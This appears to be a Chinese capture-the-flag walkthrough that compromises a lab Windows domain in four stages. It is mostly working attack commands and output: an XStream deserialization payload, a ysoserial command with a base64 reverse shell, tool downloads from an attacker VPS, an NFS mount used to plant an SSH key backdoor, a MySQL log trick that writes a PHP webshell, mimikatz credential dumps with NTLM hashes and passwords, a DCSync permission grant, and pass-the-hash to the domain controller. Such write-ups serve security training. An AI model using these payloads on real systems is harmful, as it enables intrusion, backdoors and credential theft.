目录
flag1
fscan64 -h 39.98.117.253
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.117.253 is alive
[*] Icmp alive hosts len is: 1
39.98.117.253:80 open
39.98.117.253:21 open
39.98.117.253:22 open
39.98.117.253:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.117.253 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.98.117.253:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://39.98.117.253:8080 code:200 len:3655 title:公司发货单
已完成 4/4
[*] 扫描结束,耗时: 38.6700939s
ftp匿名登录
1.txt是空的,pom.xml
<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/>
<!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
可以打XStream CVE-2021-29505和cc5
打8080端口
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections5 "bash -c {echo,YmFzaCA...0IDA+JjE=}|{base64,-d}|{bash,-i}"
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>vps</string>
<int>6666</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>vps</host>
<port>6666</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
弹shell拿到flag
flag2
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.13.14 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe04:251b prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:04:25:1b txqueuelen 1000 (Ethernet)
RX packets 109791 bytes 147614543 (147.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23683 bytes 3702075 (3.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 834 bytes 78279 (78.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 834 bytes 78279 (78.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wget http://vps:88/fscan
wget http://vps:88/frpc
wget http://vps:88/frpc.ini
chmod +x fscan
./fscan -h 172.22.13.14/24
./fscan -h 172.22.13.14/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.14:80 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.6:88 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:139 open
172.22.13.28:135 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 16.902366459s
整理一下
172.22.13.14 本机
172.22.13.57 80,22,2049 NFS
172.22.13.28 8000,3306,80 WIN-HAUWOLAO
172.22.13.6 WIN-DC DC
看57那台机子,挂个代理
NFS提权,可以看这篇文章
https://xz.aliyun.com/t/11664#toc-12
apt-get update
apt-get install nfs-common
showmount -e 172.22.13.57
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock
写rsa后门
ssh-keygen -t rsa -b 4096
cd /tmp/temp/home/joyce/
mkdir .ssh
cp /tmp/id_rsa.pub /tmp/temp/home/joyce/.ssh/
cat id_rsa.pub >> /tmp/temp/home/joyce/.ssh/authorized_keys
ssh -i id_rsa joyce@172.22.13.57
成功连接,flag没权限拿,但是还有个pAss.txt
xiaorang.lab/zhangwen\QT62f3gBhK1
尝试suid提权
find / -user root -perm -4000 -print 2>/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
/usr/lib/polkit-1/polkit-agent-helper-1
可以利用ftp
172.22.13.14
python3 -m pyftpdlib -p 6666 -u test -P test -w &
172.22.13.57
ftp 172.22.13.14 6666
test
test
put flag02.txt
回到
172.22.13.14
cat /root/flag/flag02.txt
flag3
172.22.13.14 本机
172.22.13.57 80,22,2049 NFS
172.22.13.28 8000,3306,80 WIN-HAUWOLAO
172.22.13.6 WIN-DC DC
查看28那台机器
上面fscan扫到有弱密码,直接navicat连接
root/123456
但是数据库中并没有什么数据,因为是root权限,尝试看能不能写shell
可以发现没有开启,但同时也发现了服务器上安装了phpstudy
命令行开启
set global general_log = "ON";
设置日志路径为网站根目录(这里因为知道使用了phpstudy所以改的默认网站根目录),并把文件格式修改为相应的后缀名
set global general_log_file ='C:/phpstudy_pro/WWW/shell.php';
写入木马
select '<?php eval($_POST[1]);?>';
拿到flag3
flag4
上传个mimikatz
mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 6535704 (00000000:0063ba18)
Session : RemoteInteractive from 2
User Name : zhangwen
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2023/10/5 18:31:22
SID : S-1-5-21-3269458654-3569381900-10559451-1104
msv :
[00000003] Primary
* Username : zhangwen
* Domain : XIAORANG
* NTLM : fa7d776fdfc82d3f43c9d8b7f5312d77
* SHA1 : 3e568ea10e85b91f95af47b064b713f83682d1ee
* DPAPI : 4b3a5a99aa46e26e47ff5fbe2c7e58b4
tspkg :
wdigest :
* Username : zhangwen
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : zhangwen
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 6520998 (00000000:006380a6)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/5 18:31:21
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : e104c781fe7b3f4a8bcb215097319193
* SHA1 : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72
ssp :
credman :
Authentication Id : 0 ; 6516069 (00000000:00636d65)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/5 18:31:21
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : e104c781fe7b3f4a8bcb215097319193
* SHA1 : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72
ssp :
credman :
Authentication Id : 0 ; 90670 (00000000:0001622e)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2023/10/5 18:10:44
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 89589 (00000000:00015df5)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2023/10/5 18:10:44
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 52118 (00000000:0000cb96)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/5 18:10:42
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : b5cd3591a58e1169186bcdbfd4b6322d
* SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/5 18:10:42
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : e104c781fe7b3f4a8bcb215097319193
* SHA1 : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72
ssp :
credman :
Authentication Id : 0 ; 23506 (00000000:00005bd2)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/10/5 18:10:42
SID :
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : e104c781fe7b3f4a8bcb215097319193
* SHA1 : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/5 18:10:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 52075 (00000000:0000cb6b)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/5 18:10:42
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : e104c781fe7b3f4a8bcb215097319193
* SHA1 : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/5 18:10:42
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
chenglei 位于 ACL Admin 组
net user /domain
net user chenglei /domain
那么chenglei这个账号拥有WriteDACL权限
登陆chenglei的远程桌面使用powerview给chenglei账号添加DCSync权限
chenglei/Xt61f3LBhg1
Release Empire 2.5 Release · EmpireProject/Empire (github.com)
Import-Module .\powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity chenglei -Rights DCSync -Verbose
接着使用mimikatz导出所有域内用户hash
lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt cb976ec1a1bf8a14a15142c6fecc540e 514
1106 zhangtao e786c4a4987ced162c496d0519496729 512
1000 WIN-DC$ 3e6e01dca4c30872a929cb85407b4e6c 532480
500 Administrator 6341235defdaed66fb7b682665752c9a 512
1105 chenglei 0c00801c30594a1b8eaa889d237c5382 512
1103 WIN-HAUWOLAO$ e104c781fe7b3f4a8bcb215097319193 4096
1104 zhangwen fa7d776fdfc82d3f43c9d8b7f5312d77 512
最后使用wmiexec hash传递
proxychains impacket-wmiexec -hashes :6341235defdaed66fb7b682665752c9a xiaorang.lab/Administrator@172.22.13.6
